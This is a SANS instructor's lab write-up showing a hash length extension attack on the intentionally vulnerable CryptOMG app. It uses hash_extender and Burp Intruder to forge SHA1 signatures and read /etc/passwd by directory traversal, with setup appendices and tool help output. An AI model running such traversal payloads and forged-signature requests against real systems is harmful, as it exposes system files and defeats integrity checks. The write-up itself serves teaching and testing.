Opening up the new site in a browser and we see this:

modern_webapp_p2_01

The challenge appears to be a Local File Include (LFI) to see the contents of /etc/passwd.

Selecting Challenge 5 and we see the following:

modern_webapp_p2_02

Selecting SHA1 as the Algorithm and clicking on the test link proxying through Burp gives us the parameters that we presumable have to play with to succeed.

modern_webapp_p2_03

 

algo=sha1, file=test, and hash=dd03bd22af3a4a0253a66621bcb80631556b100e

 

Sending the same GET request to repeater and we see the following response:

modern_webapp_p2_04

We now have a baseline request that gives us a 200 response code, and presumably the contents of the file called test in the HTML.

If this were HMAC we would need the secret. Brute forcing that might take a while, so let’s try a hash extension attack. Without knowing the secret we can append to the file name parameter and try a directory traversal with a LFI attack. We just need to be able to create a valid hash. So our attack will look something like this:

algo=sha1, file=test/../../../../etc/passwd, and hash=??

The problem is that we do not know the secret, and also do not know the length of the secret. This is what we need to append our data to the input parameter, assuming that they did something like this to create the hash:

sha1(filename||secret)

Where they concatenate something that we can control with something that we do not to generate a hash. The magic of this attack is that we can append to the filename and still generate a valid hash without knowing the secret! However we do have to guess the length of the secret, or brute force it. In this case we are going to assume that the secret length lies between 10 and 40 bytes.

Enter hash_extender to the rescue. Downloading it from git and making it is quick and easy. The instructions are in Appendix B.

Running the following should give us some file names and hashes to try!

./hash_extender -f sha1 --data 'test' -s dd03bd22af3a4a0253a66621bcb80631556b100e --append '../../../../../../../../../etc/passwd' --secret-min=10 --secret-max=40 --out-data-format=html --table > hashesnsignatures.out

(I had intended to put a crazy one liner in there, but Ron is way cooler and more l33t than me). The first time I tried it I had not put enough ../ in and got a 200 response code without the file contents. 9 seemed like a good number. If we are not successful we see a 404 response code and the HTML does not contain the file that we are looking for:

modern_webapp_p2_05

Running the results from hash_extender through Burp Intruder we get a hit. This was done with the hashes in one file, the strings in another, with both used as payloads to Pitchfork.

modern_webapp_p2_06

 

As it turns out the length of the secret was 34 bytes. Let’s see what we have!

modern_webapp_p2_07

 

Success! Without knowing a 34 character secret password we are still able to grab the contents of /etc/passwd through the hash extension attack.

This is one of the many practical attack techniques that we teach in the SANS course SEC642.

Also see:

Modern Web Application Penetration Testing Part 1, XSS and XSRF Together

I am teaching SEC642: Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques at multiple SANS training events around the world in 2018.

Cheers, Adrien de Beaupré
Intru-shun.ca Inc.
Certified SANS Instructor https://www.sans.org/instructors/adrien-de-beaupre
Co-author of SANS SEC642: Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques

 

References:

https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks

https://github.com/iagox86/hash_extender

https://github.com/SpiderLabs/CryptOMG

 

Appendix A: Installing CryptOMG: (Using Ubuntu 14.04; apache, mysql, and php5 are already installed)

# cd /var/www/html

# git clone https://github.com/SpiderLabs/CryptOMG.git

# apt-get install libmcrypt4 php5-mysql php5-mcrypt

— edit /var/www/html/includes/db.inc.php for mysql database settings

# php5enmod mcrypt

# service apache2 restart

 

Appendix B: Installing hash_extender: (again using Ubuntu, but in this case the Samurai WTF VM)

samurai@samuraiwtf:~/Downloads$ git clone https://github.com/iagox86/hash_extender.git

Cloning into ‘hash_extender’…

remote: Counting objects: 587, done.

remote: Total 587 (delta 0), reused 0 (delta 0), pack-reused 587

Receiving objects: 100% (587/587), 153.34 KiB | 0 bytes/s, done.

Resolving deltas: 100% (396/396), done.

Checking connectivity… done.

samurai@samuraiwtf:~/Downloads$ cd hash_extender

samurai@samuraiwtf:~/Downloads/hash_extender$ make

[CC] buffer.o

[CC] formats.o

[CC] hash_extender.o

[CC] hash_extender_engine.o

[CC] test.o

[CC] util.o

[LD] hash_extender

[CC] hash_extender_test.o

[LD] hash_extender_test

samurai@samuraiwtf:~/Downloads/hash_extender$

samurai@samuraiwtf:~/Downloads/hash_extender$ ./hash_extender

hash_extender: –data or –file is required

——————————————————————————–

HASH EXTENDER

——————————————————————————–

By Ron Bowes <ron @ skullsecurity.net>

See LICENSE.txt for license information.

Usage: ./hash_extender <–data=<data>|–file=<file>> –signature=<signature> –format=<format> [options]

INPUT OPTIONS

-d –data=<data>

The original string that we’re going to extend.

–data-format=<format>

The format the string is being passed in as. Default: raw.

Valid formats: raw, hex, html, cstr

–file=<file>

As an alternative to specifying a string, this reads the original string

as a file.

-s –signature=<sig>

The original signature.

–signature-format=<format>

The format the signature is being passed in as. Default: hex.

Valid formats: raw, hex, html, cstr

-a –append=<data>

The data to append to the string. Default: raw.

–append-format=<format>

Valid formats: raw, hex, html, cstr

-f –format=<all|format> [REQUIRED]

The hash_type of the signature. This can be given multiple times if you

want to try multiple signatures. ‘all’ will base the chosen types off

the size of the signature and use the hash(es) that make sense.

Valid types: md4, md5, ripemd160, sha, sha1, sha256, sha512, whirlpool

-l –secret=<length>

The length of the secret, if known. Default: 8.

–secret-min=<min>

–secret-max=<max>

Try different secret lengths (both options are required)

OUTPUT OPTIONS

–table

Output the string in a table format.

–out-data-format=<format>

Output data format.

Valid formats: none, raw, hex, html, html-pure, cstr, cstr-pure, fancy

–out-signature-format=<format>

Output signature format.

Valid formats: none, raw, hex, html, html-pure, cstr, cstr-pure, fancy

OTHER OPTIONS

-h –help

Display the usage (this).

–test

Run the test suite.

-q –quiet

Only output what’s absolutely necessary (the output string and the

signature)

The arguments you probably want to give are (see above for more details):

-d <data>

-s <original signature>

-a <data to append>

-f <hash format>

-l <length of secret>

samurai@samuraiwtf:~/Downloads/hash_extender$

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02